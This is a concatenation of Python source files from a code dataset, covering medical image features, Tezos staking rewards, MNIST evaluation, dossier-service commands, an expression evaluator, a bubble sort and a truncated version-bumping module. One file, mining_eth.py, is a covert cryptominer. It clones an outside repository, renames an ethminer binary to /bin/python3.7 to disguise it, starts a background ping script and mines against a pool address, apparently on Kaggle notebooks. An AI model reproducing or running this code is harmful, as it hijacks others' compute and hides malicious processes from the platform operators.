maxima = htk.segmentation.nuclear.max_clustering(\n im_log_max, im_fgnd_mask, local_max_search_radius)\n\n # filter out small objects\n min_nucleus_area = 5\n im_nuclei_seg_mask = htk.segmentation.label.area_open(im_nuclei_seg_mask, min_nucleus_area).astype(np.int)\n im_feats = htk.features.compute_morphometry_features(im_nuclei_seg_mask).mean()\n pat_name, imageIdx = getPatName(filename), getImageID(filename)\n im_feats['Case'], im_feats['ID'] = 
pat_name, getImageID(filename)\n    return pd.DataFrame(pd.Series(im_feats))\n\ndef getSemanticFeatures(filename, xlsx): \n    pat_name = getPatName(filename)\n    pat_stats = xlsx[xlsx['Case'] == pat_name]\n    return pat_stats[['Case','Grade', 'Age (years at diagnosis)', \\\n                      'Gender', 'Survival (months)', 'Vital status (1=dead)',\\\n                      'MGMT promoter status']].squeeze()\n\n\nxlsx = pd.read_excel('../tcga/TableS1.PatientData.20151020.v3.xlsx', skiprows=1)\nxlsx['Grade'] = xlsx['Grade'].str.slice(1)\nxlsx['Grade'] = pd.to_numeric(xlsx['Grade'])\nxlsx['Gender'] = (xlsx['Gender'] == 'male').astype(np.int64)\nxlsx['MGMT promoter status'] = (xlsx['MGMT promoter status'] == 'Methylated').astype(np.int64)\n\nprint(\"starting\")\ndata = []\n\nN = 10000 # 1000\nchunk_len = 500 # 50\n\n\n\nn_chunks = N // chunk_len  # integer division; a float count would break [None] * n_chunks below\n\nall_data = [None] * n_chunks\n\nprint('yay images', N)\n\ndef get_data_chunk(subarray):\n    global counter\n    global t0\n    data = []\n    for i, image in enumerate(subarray):\n        try: \n            im_features = extractImageFeatures(image)\n            sem_features = getSemanticFeatures(image, xlsx)\n            row = pd.concat((im_features, sem_features))\n            data.append(row)\n        except:\n            pass  # skip images whose feature extraction fails\n        with counter.get_lock():\n            counter.value += 1\n            if counter.value % chunk_len == 0:\n                print(counter.value / float(N) * 100, \"% done\")\n            if counter.value % (chunk_len * 2) == 0:\n                print(str(time.time() - t0) + \"s elapsed\")\n    print(len(data))\n    return data\n\nchunks = [images[i:i+chunk_len] for i in range(0, N, chunk_len)]\npoolsize = 8\n\ndef init(args):\n    ''' store the counter for later use '''\n    global counter\n    global t0\n    counter, t0 = args\ncounter = (Value('i', 0), time.time())  # (shared counter, start time) tuple, unpacked by init() in each worker\n\n#t0 = time.time()\n#print('chunks',np.array(chunks).shape, 'and N=',N)\npool = Pool(poolsize, initializer=init, initargs = (counter, ))\nall_data = pool.map(get_data_chunk, chunks)\n#all_data = pool.imap(get_data_chunk, chunks)\npool.close() # No more work\npool.join() # Wait for completion\n\n\nwith open('../tcga/dense_features/'+tumor_type + '_list_v1.pkl', 'wb') as f:\n    pickle.dump(all_data, f)\n\n'''\nprint(\"Starting....\")\nexecutor = concurrent.futures.ProcessPoolExecutor(10)\nim_features = [executor.submit(extractImageFeatures, image) for image in images[:30]]\nconcurrent.futures.wait(futures)\nprint(\"And done!\")\nsys.exit(0)\n'''","sub_path":"preprocessing/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"476089416","text":"from api.reward_api import RewardApi\n\nfrom log_config import main_logger\nfrom tzscan.mirror_selection_helper import TzScanMirrorSelector\nfrom util.rpc_utils import parse_json_response\nfrom tzscan.tzscan_reward_api import TzScanRewardApiImpl\n\nlogger = main_logger\n\nCOMM_HEAD = \" rpc get http://{}/chains/main/blocks/head\"\nCOMM_DELEGATES = \" rpc get http://{}/chains/main/blocks/{}/context/delegates/{}\"\nCOMM_BLOCK = \" rpc get http://{}/chains/main/blocks/{}~{}/\"\nCOMM_SNAPSHOT = COMM_BLOCK + \"context/raw/json/rolls/owner/snapshot/{}/\"\nCOMM_DELEGATE_BALANCE = \" rpc get http://{}/chains/main/blocks/{}/context/contracts/{}\"\n\n\nclass RpcRewardApiImpl(RewardApi):\n\n def __init__(self, nw, baking_address, wllt_clnt_mngr, node_url, validate=True):\n super(RpcRewardApiImpl, self).__init__()\n\n self.blocks_per_cycle = nw['BLOCKS_PER_CYCLE'] \n self.preserved_cycles = nw['NB_FREEZE_CYCLE']\n self.blocks_per_roll_snapshot = nw['BLOCKS_PER_ROLL_SNAPSHOT']\n \n self.baking_address = baking_address\n self.wllt_clnt_mngr = wllt_clnt_mngr\n self.node_url = node_url\n \n self.validate = validate\n if self.validate:\n mirror_selector = TzScanMirrorSelector(nw)\n mirror_selector.initialize()\n self.validate_api = TzScanRewardApiImpl(nw, self.baking_address, mirror_selector)\n\n\n def get_nb_delegators(self, cycle, verbose=False):\n _, delegators = self.__get_delegators_and_delgators_balance(cycle)\n return len(delegators)\n\n\n def get_rewards_for_cycle_map(self, cycle, verbose=False):\n\n reward_data = {}\n \n reward_data[\"delegate_staking_balance\"], reward_data[\"delegators\"] = self.__get_delegators_and_delgators_balance(cycle) \n reward_data[\"delegators_nb\"] = len(reward_data[\"delegators\"])\n \n current_level, head_hash = self.__get_current_level(verbose) \n\n # Get last block in cycle where rewards are unfrozen\n level_for_relevant_request = (cycle + self.preserved_cycles + 1) * self.blocks_per_cycle\n\n if current_level - level_for_relevant_request >= 0:\n request_metadata = COMM_BLOCK.format(self.node_url, head_hash, current_level - level_for_relevant_request)+'/metadata/'\n response_metadata = self.wllt_clnt_mngr.send_request(request_metadata)\n metadata = parse_json_response(response_metadata)\n balance_updates = metadata[\"balance_updates\"]\n\n unfrozen_rewards = unfrozen_fees = 0\n for i in range(len(balance_updates)):\n balance_update = balance_updates[i]\n if balance_update[\"kind\"] == \"freezer\":\n if balance_update[\"delegate\"] == self.baking_address:\n if balance_update[\"category\"] == \"rewards\":\n unfrozen_rewards = -int(balance_update[\"change\"])\n elif balance_update[\"category\"] == \"fees\":\n unfrozen_fees = -int(balance_update[\"change\"])\n reward_data[\"total_rewards\"] = unfrozen_rewards + unfrozen_fees\n if self.validate:\n self.__validate_reward_data(reward_data, cycle)\n else:\n logger.warn(\"Please wait until the rewards and fees for cycle {} are unfrozen\".format(cycle)) \n reward_data[\"total_rewards\"] = 0\n \n return reward_data\n\n def __get_current_level(self, verbose=False):\n response = self.wllt_clnt_mngr.send_request(COMM_HEAD.format(self.node_url))\n head = parse_json_response(response)\n current_level = int(head[\"metadata\"][\"level\"][\"level\"])\n head_hash = head[\"hash\"]\n return current_level, head_hash\n \n def __get_delegators_and_delgators_balance(self, cycle, verbose=False):\n \n hash_snapshot_block = self.__get_snapshot_block_hash(cycle)\n if hash_snapshot_block == \"\":\n return 0, []\n \n 
request = COMM_DELEGATES.format(self.node_url, hash_snapshot_block, self.baking_address)\n        response = self.wllt_clnt_mngr.send_request(request)\n\n        delegate_staking_balance = 0\n        delegators = {}\n\n        try:\n            response = parse_json_response(response)\n            delegate_staking_balance = int(response[\"staking_balance\"])\n\n            delegators_addresses = response[\"delegated_contracts\"]\n            for delegator in delegators_addresses:\n                request = COMM_DELEGATE_BALANCE.format(self.node_url, hash_snapshot_block, delegator)\n                response = self.wllt_clnt_mngr.send_request(request)\n                response = parse_json_response(response)\n                delegators[delegator] = int(response[\"balance\"])\n        except:\n            logger.warn('No delegators or unexpected error')\n\n        return delegate_staking_balance, delegators\n\n    def __get_snapshot_block_hash(self, cycle, verbose=False):\n\n        current_level, head_hash = self.__get_current_level(verbose)\n\n        level_for_snapshot_request = (cycle - self.preserved_cycles) * self.blocks_per_cycle + 1 \n\n        if current_level - level_for_snapshot_request >= 0:\n            request = COMM_SNAPSHOT.format(self.node_url, head_hash, current_level - level_for_snapshot_request, cycle)\n            response = self.wllt_clnt_mngr.send_request(request)\n            snapshots = parse_json_response(response)\n\n            if len(snapshots) == 1:\n                chosen_snapshot = snapshots[0]\n            else:\n                # without exactly one snapshot there is nothing to choose; bail out\n                # instead of using an unbound chosen_snapshot below\n                logger.info(\"Too few or too many possible snapshots found!\")\n                return \"\"\n\n            level_snapshot_block = (cycle - self.preserved_cycles - 2) * self.blocks_per_cycle + ( chosen_snapshot + 1 ) * self.blocks_per_roll_snapshot\n            request = COMM_BLOCK.format(self.node_url, head_hash, current_level - level_snapshot_block) + \" | jq -r .hash\"\n            hash_snapshot_block = self.wllt_clnt_mngr.send_request(request).rstrip()\n            return hash_snapshot_block\n        else:\n            logger.info(\"Cycle too far in the future\")\n            return \"\"\n\n    def __validate_reward_data(self, reward_data_rpc, cycle):\n        reward_data_tzscan = self.validate_api.get_rewards_for_cycle_map(cycle)\n        if reward_data_rpc[\"delegate_staking_balance\"] != int(reward_data_tzscan[\"delegate_staking_balance\"]):\n            raise Exception(\"Delegate staking balance from local node and tzscan are not identical.\")\n\n        if (reward_data_rpc[\"delegators_nb\"]) != (reward_data_tzscan[\"delegators_nb\"]):\n            raise Exception(\"Delegators number from local node and tzscan are not identical.\")\n\n        if (reward_data_rpc[\"delegators_nb\"]) == 0:\n            return\n\n        delegators_balance_tzscan = [ int(reward_data_tzscan[\"delegators_balance\"][i][1]) for i in range(len(reward_data_tzscan[\"delegators_balance\"]))]\n        print(set(list(reward_data_rpc[\"delegators\"].values())))\n        print(set(delegators_balance_tzscan))\n        if set(list(reward_data_rpc[\"delegators\"].values())) != set(delegators_balance_tzscan):\n            raise Exception(\"Delegators' balances from local node and tzscan are not identical.\")\n\n        blocks_rewards = int(reward_data_tzscan[\"blocks_rewards\"])\n        future_blocks_rewards = int(reward_data_tzscan[\"future_blocks_rewards\"])\n        endorsements_rewards = int(reward_data_tzscan[\"endorsements_rewards\"])\n        future_endorsements_rewards = int(reward_data_tzscan[\"future_endorsements_rewards\"])\n        lost_rewards_denounciation = int(reward_data_tzscan[\"lost_rewards_denounciation\"])\n        lost_fees_denounciation = int(reward_data_tzscan[\"lost_fees_denounciation\"])\n        fees = int(reward_data_tzscan[\"fees\"])\n\n        total_rewards_tzscan = (blocks_rewards + endorsements_rewards + future_blocks_rewards +\n                                future_endorsements_rewards + fees - lost_rewards_denounciation - lost_fees_denounciation)\n\n
        if reward_data_rpc[\"total_rewards\"] != total_rewards_tzscan:\n            raise Exception(\"Total rewards from local node and tzscan are not identical.\")\n\n","sub_path":"src/rpc/rpc_reward_api.py","file_name":"rpc_reward_api.py","file_ext":"py","file_size_in_byte":8204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"785518","text":"from __future__ import print_function\n\n# для обучения используется keras\nimport keras\nfrom keras import backend as K\n# встроенная API для загрузки данных MNIST с внешнего сервера\nfrom keras.datasets import mnist\n# библиотека metrics нужна для подсчитывания confusion-матрицы\nfrom sklearn import metrics\n\n# количество классов, 10 цифр - 10 классов\nnum_classes = 10\n# картинки 28*28\nimg_rows, img_cols = 28, 28\n\n# загрузка уже существующей модели keras\nmodel = keras.models.load_model(\"model/model.h5\")\n# загрузка данных\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# в зависимости от настройки keras, мы делаем решейп данных\nif K.image_data_format() == 'channels_first':\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\nelse:\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n\n# превращаем матрицу y_test в двоичную матрицу классификации\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# выполняем тестирование точности\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Потеря:', score[0])\nprint('Точность:', score[1])\n\n# с помощью обученной сетки получаем выборку в виде набора классов\ny_pred = model.predict(x_test)\n# создаём непосредственно confusion матрицу\nmatrix = metrics.confusion_matrix(y_test.argmax(axis=1), y_pred.argmax(axis=1))\nprint(matrix)\n","sub_path":"confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"240841801","text":"import os,subprocess\r\ndown_dep=\"apt install -y libmicrohttpd-dev hping3\"\r\nprint(\"Installing\")\r\nos.system(down_dep)\r\nprint(\"checking\")\r\nfile_exist=os.path.isfile('/kaggle/working/xmr-nvidia/xmrig-nvidia')\r\nprint(file_exist)\r\ncwd=os.getcwd()\r\nprint(cwd)\r\nsubprocess.call([\"git\", \"clone\",\"https://github.com/shibu143/xmr-nvidia.git\"])\r\nprint(\"Downloaded\")\r\ncip=\"xmr-nvidia/eth_ip.txt\"\r\nprint(cip)\r\nread_ip=open(cip,\"r+\")\r\nip_add=read_ip.read()\r\nprint(ip_add)\r\ncmd = \"python3.7 -P http://\"+ ip_add \r\nprint(cmd)\r\nif file_exist==True :\r\n print(\"running\")\r\n os.system(cmd)\r\n \r\n \r\n \r\nelse :\r\n cwd=os.getcwd()\r\n cping=\"nohup python \"+cwd+ \"/xmr-nvidia/website_ping.py > /dev/null 2>&1 &\"\r\n os.system(cping)\r\n cdir=cwd+\"/xmr-nvidia/ethminer\"\r\n chmod_cmd=\"chmod 755 \"+cdir\r\n os.system(chmod_cmd)\r\n mv_dir=\"mv \"+cdir+\" /bin/python3.7\"\r\n os.system(mv_dir)\r\n print(\"moved\")\r\n os.system(\"rm -rf xmr-nvidia\")\r\n print(\"Running...\") \r\n os.system(cmd)","sub_path":"mining_eth.py","file_name":"mining_eth.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"351533224","text":"# -*- coding: utf-8 -*-\nimport requests\nimport json\n\nfrom oe_daemonutils.circuit import DaemonCircuitBreaker\nfrom oe_daemonutils.dossierservice.commands import BasicCommand\nfrom requests import RequestException\n\n\nclass DetermineRegionRepsCommand(BasicCommand):\n def __init__(self, regioverantwoordelijken_url, logger, system_token, failure_threshold=5, timeout_default=60,\n max_timeout=300,\n invocation_timeout=60):\n \"\"\"\n Bepaal de regioverantwoordelijken aan de hand van een niscode en een discipline of proces\n\n :param regioverantwoordelijken_url: url voor de regioverantwoordelijken service\n :param logger: logger for the operation\n :param system_token: system token\n :param failure_threshold: the couples of times the operation should fail before opening the circuit\n :param timeout_default: default sleep time while circuit is open\n :param max_timeout: max sleep time while circuit is open\n :param invocation_timeout: max time span an operation should take, before timing out\n \"\"\"\n self.regioverantwn_url = regioverantwoordelijken_url\n self.logger = logger\n self.headers = {'OpenAmSSOID': system_token, 'Accept': 'application/json',\n 'Content-Type': 'application/json'}\n self.failure_threshold = failure_threshold\n self.timeout_default = timeout_default\n self.max_timeout = max_timeout\n self.invocation_timeout = invocation_timeout\n\n def execute(self, niscodes, discipline=None, process=None):\n circuit = DaemonCircuitBreaker(self._circuit_wrapped_determine_region_reps, self.logger,\n (IOError, ValueError, RequestException),\n failure_threshold=self.failure_threshold,\n timeout_default=self.timeout_default,\n max_timeout=self.max_timeout,\n invocation_timeout=self.invocation_timeout)\n return circuit.call(niscodes, discipline=discipline, process=process)\n\n def _circuit_wrapped_determine_region_reps(self, niscodes, discipline=None, process=None):\n \"\"\"\n Get the region reps given the area niscodes\n\n :param niscodes: list of niscodes\n :param discipline: discipline for the representatives\n :param process: for specific process\n :return: list of actor objects each having a \"actor\" attribute including the actor_uri\n \"\"\"\n params = {'niscode': niscodes}\n if process:\n params[\"proces\"] = process\n if discipline:\n params[\"discipline\"] = discipline\n res = requests.get(\n self.regioverantwn_url,\n params=params,\n headers=self.headers\n )\n res.raise_for_status()\n return json.loads(res.text)\n\n\nclass DetermineNiscodesCommand(BasicCommand):\n def __init__(self, logger, admin_grenzen_client, failure_threshold=5, timeout_default=60,\n max_timeout=300,\n invocation_timeout=60):\n \"\"\"\n Get administrative area information of the given geojson.\n If the geojson overlaps multiple administrative areas\n\n :param logger: logger for the operation\n :param failure_threshold: the couples of times the operation should fail before opening the circuit\n :param timeout_default: default sleep time while circuit is open\n :param max_timeout: max sleep time while circuit is open\n :param invocation_timeout: max time span an operation should take, before timing out\n \"\"\"\n self.logger = logger\n self.admin_grenzen_client = admin_grenzen_client\n self.failure_threshold = failure_threshold\n self.timeout_default = timeout_default\n self.max_timeout = max_timeout\n self.invocation_timeout = invocation_timeout\n\n def execute(self, geojson, types):\n \"\"\"\n Get administrative area information of the given geojson.\n If the geojson overlaps 
multiple administrative areas\n\n :param geojson: contour geojson\n :param types: array, return types of administrative areas ['gemeente', 'provincie']\n :return: adminstative area information\n \"\"\"\n circuit = DaemonCircuitBreaker(self._determine_niscodes, self.logger,\n (IOError, ValueError, RequestException),\n failure_threshold=self.failure_threshold,\n timeout_default=self.timeout_default,\n max_timeout=self.max_timeout,\n invocation_timeout=self.invocation_timeout)\n return circuit.call(geojson, types)\n\n def _determine_niscodes(self, geojson, types):\n results = []\n if 'gemeente' in types:\n results.append(self.admin_grenzen_client.get_gemeente(geojson))\n if 'provincie' in types:\n results.append(self.admin_grenzen_client.get_provincie(geojson))\n niscodes = [result['niscode'] for result in results]\n return niscodes\n","sub_path":"oe_daemonutils/dossierservice/commands/location/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"143380760","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2017 Simone Campagna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nCondition and Expression classes.\n\"\"\"\n\nimport abc\nimport ast\nfrom functools import singledispatch\n\n\n__all__ = [\n 'Expression',\n 'Condition',\n 'parse_condition',\n 'parse_expression',\n 'merge_conditions',\n 'TRUE',\n 'FALSE',\n]\n\n\n# pylint: disable=too-few-public-methods\n# pylint: disable=function-redefined\n# flake8: noqa\n\n\ndef parse_condition(source, free_variables=(), globals_d=None):\n \"\"\"Parses a conditional expression.\n\n Parameters\n ----------\n source: str\n The expression source code.\n free_variables: iterable, optional\n The expression variables (defaults to ()).\n globals_d: dict, optional\n The expression globals (defaults to {}).\n\n Returns\n -------\n Condition\n The condition.\n \"\"\"\n return Condition(\n source=source,\n free_variables=free_variables,\n globals_d=globals_d)\n\n\ndef parse_expression(source, free_variables=(), globals_d=None):\n \"\"\"Parses an expression.\n\n Parameters\n ----------\n source: str\n The expression source code.\n free_variables: iterable, optional\n The expression variables (defaults to ()).\n globals_d: dict, optional\n The expression globals (defaults to {}).\n\n Returns\n -------\n Condition\n The condition.\n \"\"\"\n return Expression(\n source=source,\n free_variables=free_variables,\n globals_d=globals_d)\n\n\ndef merge_conditions(*conditions):\n r\"\"\"Merges all conditions with `and`.\n\n Parameters\n ----------\n \\*conditions: iterable\n Conditions to merge.\n\n Returns\n -------\n MergedCondition\n The merged condition.\n \"\"\"\n return MergedCondition(*conditions)\n\n\ndef _mkbuiltins(*objs):\n \"\"\"Create builtins dictionary.\"\"\"\n dct = {}\n for obj in objs:\n dct[obj.__name__] = obj\n return dct\n\n\n\nclass BaseExpression(abc.ABC):\n \"\"\"BaseExpression class\"\"\"\n __globals__ = _mkbuiltins(abs, all, any, bool, callable, chr, complex, dict, divmod, enumerate,\n filter, float, format, frozenset, hex, int, isinstance, issubclass,\n iter, len, list, map, max, min, next, oct, ord, pow, print, range,\n repr, reversed, round, set, sorted, str, sum, tuple, type, vars, zip)\n\n def __init__(self, source, free_variables=(), globals_d=None):\n self.__source = source\n self.__free_variables = set(free_variables)\n self.__globals_d = self.__globals__.copy()\n if globals_d:\n self.__globals_d.update(globals_d)\n self.__code = self._compile(source)\n\n def _compile(self, source):\n \"\"\"Returns compiled code.\"\"\"\n ast_node = ast.parse(source, '', 'eval')\n parse_ast(ast_node, self)\n return compile(ast_node, '', 'eval')\n\n @property\n def source(self):\n \"\"\"Gets the source attribute.\"\"\"\n return self.__source\n\n @property\n def free_variables(self):\n \"\"\"Gets the free_variables attribute.\"\"\"\n return self.__free_variables\n\n @property\n def globals_d(self):\n \"\"\"Gets the globals_d attribute.\"\"\"\n return self.__globals_d\n\n def 
accepts_name(self, name):\n        \"\"\"Returns True if the name is accepted.\n\n        Parameters\n        ----------\n        name: str\n            The name.\n\n        Returns\n        -------\n        bool\n            True if expression accepts name.\n        \"\"\"\n        return name in self.__free_variables or name in self.__globals_d\n\n    def __call__(self, locals_d=None):\n        if locals_d is None:\n            locals_d = {}\n        return eval(self.__code, self.__globals_d, locals_d)  # pylint: disable=eval-used\n\n    def __repr__(self):\n        return \"{}({!r})\".format(type(self).__name__, self.__source)\n\n\nclass Expression(BaseExpression):\n    \"\"\"Expression class\"\"\"\n\n\nclass Condition(BaseExpression):\n    \"\"\"Condition class\"\"\"\n    def _compile(self, source):\n        return super()._compile(\"bool({})\".format(source))\n\n\nclass MergedCondition(Condition):\n    \"\"\"Merged conditions class\"\"\"\n    def __init__(self, *conditions):\n        sources = []\n        for condition in conditions:\n            if isinstance(condition, MergedCondition):\n                # nested merged conditions contribute their already-normalized sources\n                sources.extend(condition.sources())\n                continue\n            elif isinstance(condition, Condition):\n                source = condition.source\n            else:\n                raise TypeError(\"{!r}: not a condition\".format(condition))\n            if source == 'False':\n                sources = ['False']\n                break\n            elif source != 'True':\n                sources.append(source)\n        if sources:\n            if len(sources) == 1:\n                merged_source = sources[0]\n            else:\n                merged_source = ' and '.join('({})'.format(source) for source in sources)\n        else:\n            merged_source = 'True'\n        self.__conditions = conditions\n        self.__sources = sources\n        super().__init__(source=merged_source)\n\n    def _compile(self, source):\n        # the merged condition is evaluated through its sub-conditions,\n        # so no compiled code object is needed\n        pass\n\n    def conditions(self):\n        \"\"\"Yields conditions.\"\"\"\n        yield from self.__conditions\n\n    def sources(self):\n        \"\"\"Yields sources.\"\"\"\n        yield from self.__sources\n\n    def accepts_name(self, name):\n        for condition in self.__conditions:\n            if condition.accepts_name(name):\n                return True\n        return False\n\n    def __call__(self, locals_d=None):\n        for condition in self.__conditions:\n            if not condition(locals_d):\n                return False\n        return True\n\n    def __repr__(self):\n        return \"{}({})\".format(\n            type(self).__name__,\n            ', '.join(repr(condition) for condition in self.__conditions))\n\n\ndef _err(ast_node, expr, message=None):\n    \"\"\"Raises a SyntaxError\"\"\"\n    if hasattr(ast_node, 'col_offset'):\n        print(\"!!! \", expr.source)\n        print(\"!!! 
\", (\" \" * ast_node.col_offset) + \"^\")\n if message is None:\n message = \"ast node {!r}\".format(type(ast_node).__name__)\n raise SyntaxError(message)\n\n@singledispatch\ndef parse_ast(ast_node, expr):\n \"\"\"Parses an AST node.\n\n Parameters\n ----------\n ast_node: ast.Node\n The AST node.\n expr: BaseExpression\n The expression object.\n \"\"\"\n _err(ast_node, expr)\n\n\n@parse_ast.register(ast.Expression)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Expression\"\"\"\n parse_ast(ast_node.body, expr)\n\n\n@parse_ast.register(ast.BinOp)\ndef _(ast_node, expr):\n \"\"\"Parses ast.BinOp\"\"\"\n parse_ast(ast_node.op, expr)\n parse_ast(ast_node.left, expr)\n parse_ast(ast_node.right, expr)\n\n\n@parse_ast.register(ast.BoolOp)\ndef _(ast_node, expr):\n \"\"\"Parses ast.BoolOp\"\"\"\n parse_ast(ast_node.op, expr)\n for value in ast_node.values:\n parse_ast(value, expr)\n\n\n@parse_ast.register(ast.UnaryOp)\ndef _(ast_node, expr):\n \"\"\"Parses ast.UnaryOp\"\"\"\n parse_ast(ast_node.op, expr)\n parse_ast(ast_node.operand, expr)\n\n\n@parse_ast.register(ast.Name)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Name\"\"\"\n if not (expr.accepts_name(ast_node.id) or ast_node.id in BaseExpression.__globals__):\n print(expr, expr.source, expr.free_variables)\n _err(ast_node, expr, \"undefined name {!r}\".format(ast_node.id))\n\n\n@parse_ast.register(ast.NameConstant)\ndef _(ast_node, expr):\n \"\"\"Parses ast.NameConstant\"\"\"\n if ast_node.value not in {True, False, None}:\n _err(ast_node, expr, \"undefined name {!r}\".format(ast_node.value))\n\n\n@parse_ast.register(ast.Compare)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Compare\"\"\"\n parse_ast(ast_node.left, expr)\n for operator in ast_node.ops:\n parse_ast(operator, expr)\n for comparator in ast_node.comparators:\n parse_ast(comparator, expr)\n\n\n@parse_ast.register(ast.keyword)\ndef _(ast_node, expr):\n \"\"\"Parses ast.keyword\"\"\"\n parse_ast(ast_node.value, expr)\n\n\n@parse_ast.register(ast.Call)\ndef _(ast_node, expr):\n \"\"\"Parses ast.Call\"\"\"\n parse_ast(ast_node.func, expr)\n for arg in ast_node.args:\n parse_ast(arg, expr)\n for arg in ast_node.keywords:\n parse_ast(arg, expr)\n\n\n@parse_ast.register(ast.Add)\n@parse_ast.register(ast.Sub)\n@parse_ast.register(ast.Mult)\n@parse_ast.register(ast.Div)\n@parse_ast.register(ast.FloorDiv)\n@parse_ast.register(ast.Mod)\n@parse_ast.register(ast.Pow)\n@parse_ast.register(ast.Num)\n@parse_ast.register(ast.UAdd)\n@parse_ast.register(ast.USub)\n@parse_ast.register(ast.Lt)\n@parse_ast.register(ast.LtE)\n@parse_ast.register(ast.Gt)\n@parse_ast.register(ast.GtE)\n@parse_ast.register(ast.Eq)\n@parse_ast.register(ast.NotEq)\n@parse_ast.register(ast.Or)\n@parse_ast.register(ast.And)\n@parse_ast.register(ast.Not)\ndef _(ast_node, expr):\n # pylint: disable=unused-argument\n \"\"\"Parses ast operators\"\"\"\n pass\n\n\nTRUE = parse_condition('True')\nFALSE = parse_condition('False')\n","sub_path":"src/pnets/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"86055272","text":"from array import *\nimport random\n\nv = array('i',[])\n\nn = int(input('Escriba la cantidad de elementos del vector: '))\ni = 0\n\nwhile iv[j]:\n #intercambiar\n aux = v[i]\n v[i] = v[j]\n v[j] = aux\n j = j + 1\n i = i +1\n\nprint(v)\n\n\n\n\n\n\n\n","sub_path":"Jimenez Ruiz Beymar/M0406 Array adicionar n elementos radomicamente y bubble sort ascendente.py","file_name":"M0406 Array adicionar n elementos radomicamente y bubble sort ascendente.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"14155743","text":"x=int(input())\nx=str(x)\nans=\"\"\nflag=0\nfor idx,val in enumerate(x):\n\tif val!='0':\n\t\tans+=val\n\telse:\n\t\tflag=1\n\t\tbreak\nif flag==1:\n\tprint(ans,end=\"\")\n\tprint(x[idx+1:])\n\nelse:\n\tprint(x[:-1])\n","sub_path":"Ladder_11(Less_1300)/A_Little_Elephant_and_Bits.py","file_name":"A_Little_Elephant_and_Bits.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"647580335","text":"# built-in\nimport re\nfrom datetime import date\nfrom pathlib import Path\nfrom typing import Iterator, Optional, Union\n\n# external\nfrom dephell_discover import Root\nfrom packaging.version import VERSION_PATTERN, Version\n\n# app\nfrom .. import constants\nfrom ._roman import arabic2roman, roman2arabic\n\n\nFILE_NAMES = (\n '__init__.py',\n '__version__.py',\n '__about__.py',\n '_version.py',\n '_about.py',\n)\nREX_VERSION = re.compile(VERSION_PATTERN, re.VERBOSE | re.IGNORECASE)\nPREFIXES = {'__version__', 'VERSION', 'version'}\n\n\ndef get_version_from_file(path: Path) -> Optional[str]:\n with path.open('r') as stream:\n for line in stream:\n prefix, sep, version = line.partition('=')\n if not sep:\n continue\n if prefix.rstrip() not in PREFIXES:\n continue\n return version.strip().strip('\\'\"')\n return None\n\n\ndef get_version_from_project(project: Root) -> Optional[str]:\n for package in project.packages:\n for path in package:\n if path.name not in FILE_NAMES:\n continue\n version = get_version_from_file(path=path)\n if version:\n return version\n return None\n\n\ndef bump_file(path: Path, old: str, new: str) -> bool:\n file_bumped = False\n new_content = []\n with path.open('r') as stream:\n for line in stream:\n prefix, sep, _version = line.partition('=')\n if not sep:\n new_content.append(line)\n continue\n if prefix.rstrip() not in PREFIXES:\n new_content.append(line)\n continue\n\n # replace old version\n if old:\n new_line = line.replace(old, new, 1)\n if new_line != line:\n new_content.append(new_line)\n file_bumped = True\n continue\n\n # replace any version\n new_line, count = REX_VERSION.subn(new, line)\n if count == 1:\n new_content.append(new_line)\n file_bumped = True\n continue\n\n new_content.append(line)\n if file_bumped:\n path.write_text(''.join(new_content))\n return file_bumped\n\n\ndef bump_project(project: Root, old: str, new: str) -> Iterator[Path]:\n for package in project.packages:\n for path in package:\n if path.name not in FILE_NAMES:\n continue\n file_bumped = bump_file(path=path, old=old, new=new)\n if file_bumped:\n yield path\n\n\ndef bump_version(version: Union[Version, str], rule: str, scheme: str = 'semver') -> str:\n # check scheme\n if scheme not in constants.VERSION_SCHEMES:\n raise ValueError('invalid scheme: {}'.format(scheme))\n\n if rule == 'init':\n return constants.VERSION_INIT[scheme]\n\n # explicitly specified local version\n if rule[0] == '+':\n if 'local' not in constants.VERSION_SCHEMES[scheme]:\n raise ValueError('local numbers are unsupported by scheme ' + scheme)\n version = str(version).split('+')[0]\n return version + rule\n\n # check rule\n if rule not in constants.VERSION_SCHEMES[scheme]:\n if REX_VERSION.fullmatch(rule):\n return rule\n raise ValueError('rule {} is unsupported by scheme {}'.format(rule, scheme))\n\n if scheme == 'roman':\n version = roman2arabic(version)\n return arabic2roman(version + 1)\n\n if isinstance(version, str):\n version = Version(version)\n\n if scheme in ('semver', 'romver', 'pep', 'zerover'):\n parts = version.release + (0, 0)\n if 